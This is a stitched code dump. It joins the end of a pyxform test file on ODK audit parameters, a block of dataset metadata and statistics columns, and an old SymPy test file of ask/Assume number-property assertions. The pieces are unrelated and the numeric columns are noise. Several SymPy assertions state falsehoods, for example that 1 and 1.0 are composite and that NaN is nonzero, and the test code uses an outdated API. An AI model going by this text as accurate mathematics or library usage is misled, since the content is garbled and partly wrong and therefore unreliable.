| | type | name | parameters |
| | audit | audit | location-priority=balanced, location-min-interval=60, location-max-age=300 |
""",
xml__contains=[
"<meta>",
"<audit/>",
"</meta>",
'<bind nodeset="/meta_audit/meta/audit" type="binary" odk:location-max-age="300" odk:location-min-interval="60" odk:location-priority="balanced"/>',
],
)
def test_audit_track_changes_true(self):
self.assertPyxformXform(
name="meta_audit",
md="""
| survey | | | |
| | type | name | parameters |
| | audit | audit | track-changes=true |
""",
xml__contains=[
"<meta>",
"<audit/>",
"</meta>",
'<bind nodeset="/meta_audit/meta/audit" type="binary" odk:track-changes="true"/>',
],
)
def test_audit_track_changes_false(self):
self.assertPyxformXform(
name="meta_audit",
md="""
| survey | | | |
| | type | name | parameters |
| | audit | audit | track-changes=false |
""",
xml__contains=[
"<meta>",
"<audit/>",
"</meta>",
'<bind nodeset="/meta_audit/meta/audit" type="binary" odk:track-changes="false"/>',
],
)
def test_audit_track_changes_foo(self):
self.assertPyxformXform(
name="meta_audit",
md="""
| survey | | | |
| | type | name | parameters |
| | audit | audit | track-changes=foo |
""",
errored=True,
error__contains=["track-changes must be set to true or false"],
)
def test_audit_identify_user_foo(self):
self.assertPyxformXform(
name="meta_audit",
md="""
| survey | | | |
| | type | name | parameters |
| | audit | audit | identify-user=foo |
""",
errored=True,
error__contains=["identify-user must be set to true or false"],
)
def test_audit_identify_user_true(self):
self.assertPyxformXform(
name="meta_audit",
md="""
| survey | | | |
| | type | name | parameters |
| | audit | audit | identify-user=true |
""",
xml__contains=[
"<meta>",
"<audit/>",
"</meta>",
'<bind nodeset="/meta_audit/meta/audit" type="binary" odk:identify-user="true"/>',
],
)
def test_audit_identify_user_false(self):
self.assertPyxformXform(
name="meta_audit",
md="""
| survey | | | |
| | type | name | parameters |
| | audit | audit | identify-user=false |
""",
xml__contains=[
"<meta>",
"<audit/>",
"</meta>",
'<bind nodeset="/meta_audit/meta/audit" type="binary" odk:identify-user="false"/>',
],
)
def test_audit_track_changes_reasons_foo(self):
self.assertPyxformXform(
name="meta_audit",
md="""
| survey | | | |
| | type | name | parameters |
| | audit | audit | track-changes-reasons=foo |
""",
errored=True,
error__contains=["track-changes-reasons must be set to on-form-edit"],
)
def test_audit_track_changes_reasons_on_form_edit(self):
self.assertPyxformXform(
name="meta_audit",
md="""
| survey | | | |
| | type | name | parameters |
| | audit | audit | track-changes-reasons=on-form-edit |
""",
xml__contains=[
"<meta>",
"<audit/>",
"</meta>",
'<bind nodeset="/meta_audit/meta/audit" type="binary" odk:track-changes-reasons="on-form-edit"/>',
],
)
def test_audit_location_track_changes(self):
self.assertPyxformXform(
name="meta_audit",
md="""
| survey | | | |
| | type | name | parameters |
| | audit | audit | location-priority=balanced, track-changes=true, location-min-interval=60, location-max-age=300 |
""",
xml__contains=[
"<meta>",
"<audit/>",
"</meta>",
'<bind nodeset="/meta_audit/meta/audit" type="binary" odk:location-max-age="300" odk:location-min-interval="60" odk:location-priority="balanced" odk:track-changes="true"/>',
],
)
| 39.021739
| 189
| 0.381337
| 759
| 10,770
| 5.229249
| 0.106719
| 0.108844
| 0.065508
| 0.136054
| 0.846813
| 0.806752
| 0.758377
| 0.705719
| 0.705719
| 0.682036
| 0
| 0.005431
| 0.504178
| 10,770
| 275
| 190
| 39.163636
| 0.737828
| 0.009099
| 0
| 0.705645
| 0
| 0.060484
| 0.592262
| 0.102733
| 0
| 0
| 0
| 0
| 0.072581
| 1
| 0.072581
| false
| 0
| 0.004032
| 0
| 0.080645
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
36db7a055743cf3381e48fd6ed5aec72c7fb5dc2
| 44,118
|
py
|
Python
|
sympy/assumptions/tests/test_query.py
|
benjaminmcdonald/sympy
|
dc44dcc6d6d5f2d0a7ede35eff5f421ab4b11a3e
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/assumptions/tests/test_query.py
|
benjaminmcdonald/sympy
|
dc44dcc6d6d5f2d0a7ede35eff5f421ab4b11a3e
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/assumptions/tests/test_query.py
|
benjaminmcdonald/sympy
|
dc44dcc6d6d5f2d0a7ede35eff5f421ab4b11a3e
|
[
"BSD-3-Clause"
] | null | null | null |
from sympy.core import Symbol, symbols, S, Rational, Integer, I, pi, oo
from sympy.functions import exp, log, sin, cos, sign, re, im, sqrt, Abs
from sympy.assumptions import (Assume, global_assumptions, Q, ask,
register_handler, remove_handler, AssumptionsContext)
from sympy.assumptions.handlers import AskHandler
from sympy.utilities.pytest import raises, XFAIL
def test_int_1():
z = 1
assert ask(z, Q.commutative) == True
assert ask(z, Q.integer) == True
assert ask(z, Q.rational) == True
assert ask(z, Q.real) == True
assert ask(z, Q.complex) == True
assert ask(z, Q.irrational) == False
assert ask(z, Q.imaginary) == False
assert ask(z, Q.positive) == True
assert ask(z, Q.negative) == False
assert ask(z, Q.even) == False
assert ask(z, Q.odd) == True
assert ask(z, Q.bounded) == True
assert ask(z, Q.infinitesimal) == False
assert ask(z, Q.prime) == False
assert ask(z, Q.composite) == True
def test_float_1():
z = 1.0
assert ask(z, Q.commutative) == True
assert ask(z, Q.integer) == True
assert ask(z, Q.rational) == True
assert ask(z, Q.real) == True
assert ask(z, Q.complex) == True
assert ask(z, Q.irrational) == False
assert ask(z, Q.imaginary) == False
assert ask(z, Q.positive) == True
assert ask(z, Q.negative) == False
assert ask(z, Q.even) == False
assert ask(z, Q.odd) == True
assert ask(z, Q.bounded) == True
assert ask(z, Q.infinitesimal) == False
assert ask(z, Q.prime) == False
assert ask(z, Q.composite) == True
z = 7.2123
assert ask(z, Q.commutative) == True
assert ask(z, Q.integer) == False
assert ask(z, Q.rational) == True
assert ask(z, Q.real) == True
assert ask(z, Q.complex) == True
assert ask(z, Q.irrational) == False
assert ask(z, Q.imaginary) == False
assert ask(z, Q.positive) == True
assert ask(z, Q.negative) == False
assert ask(z, Q.even) == False
assert ask(z, Q.odd) == False
assert ask(z, Q.bounded) == True
assert ask(z, Q.infinitesimal) == False
assert ask(z, Q.prime) == False
assert ask(z, Q.composite) == False
def test_zero_0():
z = Integer(0)
assert ask(z, Q.nonzero) == False
assert ask(z, Q.commutative) == True
assert ask(z, Q.integer) == True
assert ask(z, Q.rational) == True
assert ask(z, Q.real) == True
assert ask(z, Q.complex) == True
assert ask(z, Q.imaginary) == False
assert ask(z, Q.positive) == False
assert ask(z, Q.negative) == False
assert ask(z, Q.even) == True
assert ask(z, Q.odd) == False
assert ask(z, Q.bounded) == True
assert ask(z, Q.infinitesimal) == True
assert ask(z, Q.prime) == False
assert ask(z, Q.composite) == False
def test_negativeone():
z = Integer(-1)
assert ask(z, Q.nonzero) == True
assert ask(z, Q.commutative) == True
assert ask(z, Q.integer) == True
assert ask(z, Q.rational) == True
assert ask(z, Q.real) == True
assert ask(z, Q.complex) == True
assert ask(z, Q.irrational) == False
assert ask(z, Q.imaginary) == False
assert ask(z, Q.positive) == False
assert ask(z, Q.negative) == True
assert ask(z, Q.even) == False
assert ask(z, Q.odd) == True
assert ask(z, Q.bounded) == True
assert ask(z, Q.infinitesimal) == False
assert ask(z, Q.prime) == False
assert ask(z, Q.composite) == False
def test_infinity():
oo = S.Infinity
assert ask(oo, Q.commutative) == True
assert ask(oo, Q.integer) == False
assert ask(oo, Q.rational) == False
assert ask(oo, Q.real) == False
assert ask(oo, Q.extended_real) == True
assert ask(oo, Q.complex) == False
assert ask(oo, Q.irrational) == False
assert ask(oo, Q.imaginary) == False
assert ask(oo, Q.positive) == True
assert ask(oo, Q.negative) == False
assert ask(oo, Q.even) == False
assert ask(oo, Q.odd) == False
assert ask(oo, Q.bounded) == False
assert ask(oo, Q.infinitesimal) == False
assert ask(oo, Q.prime) == False
assert ask(oo, Q.composite) == False
def test_neg_infinity():
mm = S.NegativeInfinity
assert ask(mm, Q.commutative) == True
assert ask(mm, Q.integer) == False
assert ask(mm, Q.rational) == False
assert ask(mm, Q.real) == False
assert ask(mm, Q.extended_real) == True
assert ask(mm, Q.complex) == False
assert ask(mm, Q.irrational) == False
assert ask(mm, Q.imaginary) == False
assert ask(mm, Q.positive) == False
assert ask(mm, Q.negative) == True
assert ask(mm, Q.even) == False
assert ask(mm, Q.odd) == False
assert ask(mm, Q.bounded) == False
assert ask(mm, Q.infinitesimal) == False
assert ask(mm, Q.prime) == False
assert ask(mm, Q.composite) == False
def test_nan():
nan = S.NaN
assert ask(nan, Q.commutative) == True
assert ask(nan, Q.integer) == False
assert ask(nan, Q.rational) == False
assert ask(nan, Q.real) == False
assert ask(nan, Q.extended_real) == False
assert ask(nan, Q.complex) == False
assert ask(nan, Q.irrational) == False
assert ask(nan, Q.imaginary) == False
assert ask(nan, Q.positive) == False
assert ask(nan, Q.nonzero) == True
assert ask(nan, Q.even) == False
assert ask(nan, Q.odd) == False
assert ask(nan, Q.bounded) == False
assert ask(nan, Q.infinitesimal) == False
assert ask(nan, Q.prime) == False
assert ask(nan, Q.composite) == False
def test_Rational_number():
r = Rational(3,4)
assert ask(r, Q.commutative) == True
assert ask(r, Q.integer) == False
assert ask(r, Q.rational) == True
assert ask(r, Q.real) == True
assert ask(r, Q.complex) == True
assert ask(r, Q.irrational) == False
assert ask(r, Q.imaginary) == False
assert ask(r, Q.positive) == True
assert ask(r, Q.negative) == False
assert ask(r, Q.even) == False
assert ask(r, Q.odd) == False
assert ask(r, Q.bounded) == True
assert ask(r, Q.infinitesimal) == False
assert ask(r, Q.prime) == False
assert ask(r, Q.composite) == False
r = Rational(1,4)
assert ask(r, Q.positive) == True
assert ask(r, Q.negative) == False
r = Rational(5,4)
assert ask(r, Q.negative) == False
assert ask(r, Q.positive) == True
r = Rational(5,3)
assert ask(r, Q.positive) == True
assert ask(r, Q.negative) == False
r = Rational(-3,4)
assert ask(r, Q.positive) == False
assert ask(r, Q.negative) == True
r = Rational(-1,4)
assert ask(r, Q.positive) == False
assert ask(r, Q.negative) == True
r = Rational(-5,4)
assert ask(r, Q.negative) == True
assert ask(r, Q.positive) == False
r = Rational(-5,3)
assert ask(r, Q.positive) == False
assert ask(r, Q.negative) == True
def test_sqrt_2():
z = sqrt(2)
assert ask(z, Q.commutative) == True
assert ask(z, Q.integer) == False
assert ask(z, Q.rational) == False
assert ask(z, Q.real) == True
assert ask(z, Q.complex) == True
assert ask(z, Q.irrational) == True
assert ask(z, Q.imaginary) == False
assert ask(z, Q.positive) == True
assert ask(z, Q.negative) == False
assert ask(z, Q.even) == False
assert ask(z, Q.odd) == False
assert ask(z, Q.bounded) == True
assert ask(z, Q.infinitesimal) == False
assert ask(z, Q.prime) == False
assert ask(z, Q.composite) == False
def test_pi():
z = S.Pi
assert ask(z, Q.commutative) == True
assert ask(z, Q.integer) == False
assert ask(z, Q.rational) == False
assert ask(z, Q.real) == True
assert ask(z, Q.complex) == True
assert ask(z, Q.irrational) == True
assert ask(z, Q.imaginary) == False
assert ask(z, Q.positive) == True
assert ask(z, Q.negative) == False
assert ask(z, Q.even) == False
assert ask(z, Q.odd) == False
assert ask(z, Q.bounded) == True
assert ask(z, Q.infinitesimal) == False
assert ask(z, Q.prime) == False
assert ask(z, Q.composite) == False
z = S.Pi + 1
assert ask(z, Q.commutative) == True
assert ask(z, Q.integer) == False
assert ask(z, Q.rational) == False
assert ask(z, Q.real) == True
assert ask(z, Q.complex) == True
assert ask(z, Q.irrational) == True
assert ask(z, Q.imaginary) == False
assert ask(z, Q.positive) == True
assert ask(z, Q.negative) == False
assert ask(z, Q.even) == False
assert ask(z, Q.odd) == False
assert ask(z, Q.bounded) == True
assert ask(z, Q.infinitesimal) == False
assert ask(z, Q.prime) == False
assert ask(z, Q.composite) == False
z = 2*S.Pi
assert ask(z, Q.commutative) == True
assert ask(z, Q.integer) == False
assert ask(z, Q.rational) == False
assert ask(z, Q.real) == True
assert ask(z, Q.complex) == True
assert ask(z, Q.irrational) == True
assert ask(z, Q.imaginary) == False
assert ask(z, Q.positive) == True
assert ask(z, Q.negative) == False
assert ask(z, Q.even) == False
assert ask(z, Q.odd) == False
assert ask(z, Q.bounded) == True
assert ask(z, Q.infinitesimal) == False
assert ask(z, Q.prime) == False
assert ask(z, Q.composite) == False
z = S.Pi ** 2
assert ask(z, Q.commutative) == True
assert ask(z, Q.integer) == False
assert ask(z, Q.rational) == False
assert ask(z, Q.real) == True
assert ask(z, Q.complex) == True
assert ask(z, Q.irrational) == True
assert ask(z, Q.imaginary) == False
assert ask(z, Q.positive) == True
assert ask(z, Q.negative) == False
assert ask(z, Q.even) == False
assert ask(z, Q.odd) == False
assert ask(z, Q.bounded) == True
assert ask(z, Q.infinitesimal) == False
assert ask(z, Q.prime) == False
assert ask(z, Q.composite) == False
z = (1+S.Pi) ** 2
assert ask(z, Q.commutative) == True
assert ask(z, Q.integer) == False
assert ask(z, Q.rational) == False
assert ask(z, Q.real) == True
assert ask(z, Q.complex) == True
assert ask(z, Q.irrational) == True
assert ask(z, Q.imaginary) == False
assert ask(z, Q.positive) == True
assert ask(z, Q.negative) == False
assert ask(z, Q.even) == False
assert ask(z, Q.odd) == False
assert ask(z, Q.bounded) == True
assert ask(z, Q.infinitesimal) == False
assert ask(z, Q.prime) == False
assert ask(z, Q.composite) == False
def test_E():
z = S.Exp1
assert ask(z, Q.commutative) == True
assert ask(z, Q.integer) == False
assert ask(z, Q.rational) == False
assert ask(z, Q.real) == True
assert ask(z, Q.complex) == True
assert ask(z, Q.irrational) == True
assert ask(z, Q.imaginary) == False
assert ask(z, Q.positive) == True
assert ask(z, Q.negative) == False
assert ask(z, Q.even) == False
assert ask(z, Q.odd) == False
assert ask(z, Q.bounded) == True
assert ask(z, Q.infinitesimal) == False
assert ask(z, Q.prime) == False
assert ask(z, Q.composite) == False
def test_I():
I = S.ImaginaryUnit
z = I
assert ask(z, Q.commutative) == True
assert ask(z, Q.integer) == False
assert ask(z, Q.rational) == False
assert ask(z, Q.real) == False
assert ask(z, Q.complex) == True
assert ask(z, Q.irrational) == False
assert ask(z, Q.imaginary) == True
assert ask(z, Q.positive) == False
assert ask(z, Q.negative) == False
assert ask(z, Q.even) == False
assert ask(z, Q.odd) == False
assert ask(z, Q.bounded) == True
assert ask(z, Q.infinitesimal) == False
assert ask(z, Q.prime) == False
assert ask(z, Q.composite) == False
z = 1 + I
assert ask(z, Q.commutative) == True
assert ask(z, Q.integer) == False
assert ask(z, Q.rational) == False
assert ask(z, Q.real) == False
assert ask(z, Q.complex) == True
assert ask(z, Q.irrational) == False
assert ask(z, Q.imaginary) == False
assert ask(z, Q.positive) == False
assert ask(z, Q.negative) == False
assert ask(z, Q.even) == False
assert ask(z, Q.odd) == False
assert ask(z, Q.bounded) == True
assert ask(z, Q.infinitesimal) == False
assert ask(z, Q.prime) == False
assert ask(z, Q.composite) == False
z = I*(1+I)
assert ask(z, Q.commutative) == True
assert ask(z, Q.integer) == False
assert ask(z, Q.rational) == False
assert ask(z, Q.real) == False
assert ask(z, Q.complex) == True
assert ask(z, Q.irrational) == False
assert ask(z, Q.imaginary) == False
assert ask(z, Q.positive) == False
assert ask(z, Q.negative) == False
assert ask(z, Q.even) == False
assert ask(z, Q.odd) == False
assert ask(z, Q.bounded) == True
assert ask(z, Q.infinitesimal) == False
assert ask(z, Q.prime) == False
assert ask(z, Q.composite) == False
def test_bounded():
x, y = symbols('xy')
assert ask(x, Q.bounded) == False
assert ask(x, Q.bounded, Assume(x, Q.bounded)) == True
assert ask(x, Q.bounded, Assume(y, Q.bounded)) == False
assert ask(x, Q.bounded, Assume(x, Q.complex)) == False
assert ask(x+1, Q.bounded) == False
assert ask(x+1, Q.bounded, Assume(x, Q.bounded)) == True
assert ask(x+y, Q.bounded) == None
assert ask(x+y, Q.bounded, Assume(x, Q.bounded)) == False
assert ask(x+1, Q.bounded, Assume(x, Q.bounded) & \
Assume(y, Q.bounded)) == True
assert ask(2*x, Q.bounded) == False
assert ask(2*x, Q.bounded, Assume(x, Q.bounded)) == True
assert ask(x*y, Q.bounded) == None
assert ask(x*y, Q.bounded, Assume(x, Q.bounded)) == False
assert ask(x*y, Q.bounded, Assume(x, Q.bounded) & \
Assume(y, Q.bounded)) == True
assert ask(x**2, Q.bounded) == False
assert ask(2**x, Q.bounded) == False
assert ask(2**x, Q.bounded, Assume(x, Q.bounded)) == True
assert ask(x**x, Q.bounded) == False
assert ask(Rational(1,2) ** x, Q.bounded) == True
assert ask(x ** Rational(1,2), Q.bounded) == False
# sign function
assert ask(sign(x), Q.bounded) == True
assert ask(sign(x), Q.bounded, Assume(x, Q.bounded, False)) == True
# exponential functions
assert ask(log(x), Q.bounded) == False
assert ask(log(x), Q.bounded, Assume(x, Q.bounded)) == True
assert ask(exp(x), Q.bounded) == False
assert ask(exp(x), Q.bounded, Assume(x, Q.bounded)) == True
assert ask(exp(2), Q.bounded) == True
# trigonometric functions
assert ask(sin(x), Q.bounded) == True
assert ask(sin(x), Q.bounded, Assume(x, Q.bounded, False)) == True
assert ask(cos(x), Q.bounded) == True
assert ask(cos(x), Q.bounded, Assume(x, Q.bounded, False)) == True
assert ask(2*sin(x), Q.bounded) == True
assert ask(sin(x)**2, Q.bounded) == True
assert ask(cos(x)**2, Q.bounded) == True
assert ask(cos(x) + sin(x), Q.bounded) == True
@XFAIL
def test_bounded_xfail():
"""We need to support relations in ask for this to work"""
x = Symbol('x')
assert ask(sin(x)**x, Q.bounded) == True
assert ask(cos(x)**x, Q.bounded) == True
assert ask(sin(x) ** x, Q.bounded) == True
def test_commutative():
"""By default objects are Q.commutative that is why it returns True
for both key=True and key=False"""
x, y = symbols('xy')
assert ask(x, Q.commutative) == True
assert ask(x, Q.commutative, Assume(x, Q.commutative, False)) == False
assert ask(x, Q.commutative, Assume(x, Q.complex)) == True
assert ask(x, Q.commutative, Assume(x, Q.imaginary)) == True
assert ask(x, Q.commutative, Assume(x, Q.real)) == True
assert ask(x, Q.commutative, Assume(x, Q.positive)) == True
assert ask(x, Q.commutative, Assume(y, Q.commutative, False)) == True
assert ask(2*x, Q.commutative) == True
assert ask(2*x, Q.commutative, Assume(x, Q.commutative, False)) == False
assert ask(x + 1, Q.commutative) == True
assert ask(x + 1, Q.commutative, Assume(x, Q.commutative, False)) == False
assert ask(x**2, Q.commutative) == True
assert ask(x**2, Q.commutative, Assume(x, Q.commutative, False)) == False
assert ask(log(x), Q.commutative) == True
def test_complex():
x, y = symbols('xy')
assert ask(x, Q.complex) == None
assert ask(x, Q.complex, Assume(x, Q.complex)) == True
assert ask(x, Q.complex, Assume(y, Q.complex)) == None
assert ask(x, Q.complex, Assume(x, Q.complex, False)) == False
assert ask(x, Q.complex, Assume(x, Q.real)) == True
assert ask(x, Q.complex, Assume(x, Q.real, False)) == None
assert ask(x, Q.complex, Assume(x, Q.rational)) == True
assert ask(x, Q.complex, Assume(x, Q.irrational)) == True
assert ask(x, Q.complex, Assume(x, Q.positive)) == True
assert ask(x, Q.complex, Assume(x, Q.imaginary)) == True
# a+b
assert ask(x+1, Q.complex, Assume(x, Q.complex)) == True
assert ask(x+1, Q.complex, Assume(x, Q.real)) == True
assert ask(x+1, Q.complex, Assume(x, Q.rational)) == True
assert ask(x+1, Q.complex, Assume(x, Q.irrational)) == True
assert ask(x+1, Q.complex, Assume(x, Q.imaginary)) == True
assert ask(x+1, Q.complex, Assume(x, Q.integer)) == True
assert ask(x+1, Q.complex, Assume(x, Q.even)) == True
assert ask(x+1, Q.complex, Assume(x, Q.odd)) == True
assert ask(x+y, Q.complex, Assume(x, Q.complex) & Assume(y, Q.complex)) == True
assert ask(x+y, Q.complex, Assume(x, Q.real) & Assume(y, Q.imaginary)) == True
# a*x +b
assert ask(2*x+1, Q.complex, Assume(x, Q.complex)) == True
assert ask(2*x+1, Q.complex, Assume(x, Q.real)) == True
assert ask(2*x+1, Q.complex, Assume(x, Q.positive)) == True
assert ask(2*x+1, Q.complex, Assume(x, Q.rational)) == True
assert ask(2*x+1, Q.complex, Assume(x, Q.irrational)) == True
assert ask(2*x+1, Q.complex, Assume(x, Q.imaginary)) == True
assert ask(2*x+1, Q.complex, Assume(x, Q.integer)) == True
assert ask(2*x+1, Q.complex, Assume(x, Q.even)) == True
assert ask(2*x+1, Q.complex, Assume(x, Q.odd)) == True
# x**2
assert ask(x**2, Q.complex, Assume(x, Q.complex)) == True
assert ask(x**2, Q.complex, Assume(x, Q.real)) == True
assert ask(x**2, Q.complex, Assume(x, Q.positive)) == True
assert ask(x**2, Q.complex, Assume(x, Q.rational)) == True
assert ask(x**2, Q.complex, Assume(x, Q.irrational)) == True
assert ask(x**2, Q.complex, Assume(x, Q.imaginary)) == True
assert ask(x**2, Q.complex, Assume(x, Q.integer)) == True
assert ask(x**2, Q.complex, Assume(x, Q.even)) == True
assert ask(x**2, Q.complex, Assume(x, Q.odd)) == True
# 2**x
assert ask(2**x, Q.complex, Assume(x, Q.complex)) == True
assert ask(2**x, Q.complex, Assume(x, Q.real)) == True
assert ask(2**x, Q.complex, Assume(x, Q.positive)) == True
assert ask(2**x, Q.complex, Assume(x, Q.rational)) == True
assert ask(2**x, Q.complex, Assume(x, Q.irrational)) == True
assert ask(2**x, Q.complex, Assume(x, Q.imaginary)) == True
assert ask(2**x, Q.complex, Assume(x, Q.integer)) == True
assert ask(2**x, Q.complex, Assume(x, Q.even)) == True
assert ask(2**x, Q.complex, Assume(x, Q.odd)) == True
assert ask(x**y, Q.complex, Assume(x, Q.complex) & \
Assume(y, Q.complex)) == True
# trigonometric expressions
assert ask(sin(x), Q.complex) == True
assert ask(sin(2*x + 1), Q.complex) == True
assert ask(cos(x), Q.complex) == True
assert ask(cos(2*x+1), Q.complex) == True
# exponential
assert ask(exp(x), Q.complex) == True
assert ask(exp(x), Q.complex) == True
# Q.complexes
assert ask(Abs(x), Q.complex) == True
assert ask(re(x), Q.complex) == True
assert ask(im(x), Q.complex) == True
def test_even():
x, y, z, t = symbols('x y z t')
assert ask(x, Q.even) == None
assert ask(x, Q.even, Assume(x, Q.integer)) == None
assert ask(x, Q.even, Assume(x, Q.integer, False)) == False
assert ask(x, Q.even, Assume(x, Q.rational)) == None
assert ask(x, Q.even, Assume(x, Q.positive)) == None
assert ask(2*x, Q.even) == None
assert ask(2*x, Q.even, Assume(x, Q.integer)) == True
assert ask(2*x, Q.even, Assume(x, Q.even)) == True
assert ask(2*x, Q.even, Assume(x, Q.irrational)) == False
assert ask(2*x, Q.even, Assume(x, Q.odd)) == True
assert ask(2*x, Q.even, Assume(x, Q.integer, False)) == None
assert ask(3*x, Q.even, Assume(x, Q.integer)) == None
assert ask(3*x, Q.even, Assume(x, Q.even)) == True
assert ask(3*x, Q.even, Assume(x, Q.odd)) == False
assert ask(x+1, Q.even, Assume(x, Q.odd)) == True
assert ask(x+1, Q.even, Assume(x, Q.even)) == False
assert ask(x+2, Q.even, Assume(x, Q.odd)) == False
assert ask(x+2, Q.even, Assume(x, Q.even)) == True
assert ask(7-x, Q.even, Assume(x, Q.odd)) == True
assert ask(7+x, Q.even, Assume(x, Q.odd)) == True
assert ask(x+y, Q.even, Assume(x, Q.odd) & Assume(y, Q.odd)) == True
assert ask(x+y, Q.even, Assume(x, Q.odd) & Assume(y, Q.even)) == False
assert ask(x+y, Q.even, Assume(x, Q.even) & Assume(y, Q.even)) == True
assert ask(2*x + 1, Q.even, Assume(x, Q.integer)) == False
assert ask(2*x*y, Q.even, Assume(x, Q.rational) & Assume(x, Q.rational)) == None
assert ask(2*x*y, Q.even, Assume(x, Q.irrational) & Assume(x, Q.irrational)) == None
assert ask(x+y+z, Q.even, Assume(x, Q.odd) & Assume(y, Q.odd) & \
Assume(z, Q.even)) == True
assert ask(x+y+z+t, Q.even, Assume(x, Q.odd) & Assume(y, Q.odd) & \
Assume(z, Q.even) & Assume(t, Q.integer)) == None
assert ask(Abs(x), Q.even, Assume(x, Q.even)) == True
assert ask(Abs(x), Q.even, Assume(x, Q.even, False)) == None
assert ask(re(x), Q.even, Assume(x, Q.even)) == True
assert ask(re(x), Q.even, Assume(x, Q.even, False)) == None
assert ask(im(x), Q.even, Assume(x, Q.even)) == True
assert ask(im(x), Q.even, Assume(x, Q.real)) == True
def test_extended_real():
x = symbols('x')
assert ask(x, Q.extended_real, Assume(x, Q.positive)) == True
assert ask(-x, Q.extended_real, Assume(x, Q.positive)) == True
assert ask(-x, Q.extended_real, Assume(x, Q.negative)) == True
assert ask(x+S.Infinity, Q.extended_real, Assume(x, Q.real)) == True
def test_rational():
x, y = symbols('xy')
assert ask(x, Q.rational, Assume(x, Q.integer)) == True
assert ask(x, Q.rational, Assume(x, Q.irrational)) == False
assert ask(x, Q.rational, Assume(x, Q.real)) == None
assert ask(x, Q.rational, Assume(x, Q.positive)) == None
assert ask(x, Q.rational, Assume(x, Q.negative)) == None
assert ask(x, Q.rational, Assume(x, Q.nonzero)) == None
assert ask(2*x, Q.rational, Assume(x, Q.rational)) == True
assert ask(2*x, Q.rational, Assume(x, Q.integer)) == True
assert ask(2*x, Q.rational, Assume(x, Q.even)) == True
assert ask(2*x, Q.rational, Assume(x, Q.odd)) == True
assert ask(2*x, Q.rational, Assume(x, Q.irrational)) == False
assert ask(x/2, Q.rational, Assume(x, Q.rational)) == True
assert ask(x/2, Q.rational, Assume(x, Q.integer)) == True
assert ask(x/2, Q.rational, Assume(x, Q.even)) == True
assert ask(x/2, Q.rational, Assume(x, Q.odd)) == True
assert ask(x/2, Q.rational, Assume(x, Q.irrational)) == False
assert ask(1/x, Q.rational, Assume(x, Q.rational)) == True
assert ask(1/x, Q.rational, Assume(x, Q.integer)) == True
assert ask(1/x, Q.rational, Assume(x, Q.even)) == True
assert ask(1/x, Q.rational, Assume(x, Q.odd)) == True
assert ask(1/x, Q.rational, Assume(x, Q.irrational)) == False
assert ask(2/x, Q.rational, Assume(x, Q.rational)) == True
assert ask(2/x, Q.rational, Assume(x, Q.integer)) == True
assert ask(2/x, Q.rational, Assume(x, Q.even)) == True
assert ask(2/x, Q.rational, Assume(x, Q.odd)) == True
assert ask(2/x, Q.rational, Assume(x, Q.irrational)) == False
# with multiple symbols
assert ask(x*y, Q.rational, Assume(x, Q.irrational) & \
Assume(y, Q.irrational)) == None
assert ask(y/x, Q.rational, Assume(x, Q.rational) & \
Assume(y, Q.rational)) == True
assert ask(y/x, Q.rational, Assume(x, Q.integer) & \
Assume(y, Q.rational)) == True
assert ask(y/x, Q.rational, Assume(x, Q.even) & \
Assume(y, Q.rational)) == True
assert ask(y/x, Q.rational, Assume(x, Q.odd) & \
Assume(y, Q.rational)) == True
assert ask(y/x, Q.rational, Assume(x, Q.irrational) & \
Assume(y, Q.rational)) == False
def test_imaginary():
x, y, z = symbols('x y z')
I = S.ImaginaryUnit
assert ask(x, Q.imaginary) == None
assert ask(x, Q.imaginary, Assume(x, Q.real)) == False
assert ask(x, Q.imaginary, Assume(x, Q.prime)) == False
assert ask(x+1, Q.imaginary, Assume(x, Q.real)) == False
assert ask(x+1, Q.imaginary, Assume(x, Q.imaginary)) == False
assert ask(x+I, Q.imaginary, Assume(x, Q.real)) == False
assert ask(x+I, Q.imaginary, Assume(x, Q.imaginary)) == True
assert ask(x+y, Q.imaginary, Assume(x, Q.imaginary) & \
Assume(y, Q.imaginary)) == True
assert ask(x+y, Q.imaginary, Assume(x, Q.real) & \
Assume(y, Q.real)) == False
assert ask(x+y, Q.imaginary, Assume(x, Q.imaginary) & \
Assume(y, Q.real)) == False
assert ask(x+y, Q.imaginary, Assume(x, Q.complex) & \
Assume(y, Q.real)) == None
assert ask(I*x, Q.imaginary, Assume(x, Q.real)) == True
assert ask(I*x, Q.imaginary, Assume(x, Q.imaginary)) == False
assert ask(I*x, Q.imaginary, Assume(x, Q.complex)) == None
assert ask(x*y, Q.imaginary, Assume(x, Q.imaginary) & \
Assume(y, Q.real)) == True
assert ask(x+y+z, Q.imaginary, Assume(x, Q.real) & \
Assume(y, Q.real) & Assume(z, Q.real)) == False
assert ask(x+y+z, Q.imaginary, Assume(x, Q.real) & \
Assume(y, Q.real) & Assume(z, Q.imaginary)) == None
assert ask(x+y+z, Q.imaginary, Assume(x, Q.real) & \
Assume(y, Q.imaginary) & Assume(z, Q.imaginary)) == False
def test_infinitesimal():
x, y = symbols('x y')
assert ask(x, Q.infinitesimal) == None
assert ask(x, Q.infinitesimal, Assume(x, Q.infinitesimal)) == True
assert ask(2*x, Q.infinitesimal, Assume(x, Q.infinitesimal)) == True
assert ask(x*y, Q.infinitesimal, Assume(x, Q.infinitesimal)) == None
assert ask(x*y, Q.infinitesimal, Assume(x, Q.infinitesimal) & \
Assume(y, Q.infinitesimal)) == True
assert ask(x*y, Q.infinitesimal, Assume(x, Q.infinitesimal) & \
Assume(y, Q.bounded)) == True
assert ask(x**2, Q.infinitesimal, Assume(x, Q.infinitesimal)) == True
def test_integer():
x = symbols('x')
assert ask(x, Q.integer) == None
assert ask(x, Q.integer, Assume(x, Q.integer)) == True
assert ask(x, Q.integer, Assume(x, Q.integer, False)) == False
assert ask(x, Q.integer, Assume(x, Q.real, False)) == False
assert ask(x, Q.integer, Assume(x, Q.positive, False)) == None
assert ask(x, Q.integer, Assume(x, Q.even) | Assume(x, Q.odd)) == True
assert ask(2*x, Q.integer, Assume(x, Q.integer)) == True
assert ask(2*x, Q.integer, Assume(x, Q.even)) == True
assert ask(2*x, Q.integer, Assume(x, Q.prime)) == True
assert ask(2*x, Q.integer, Assume(x, Q.rational)) == None
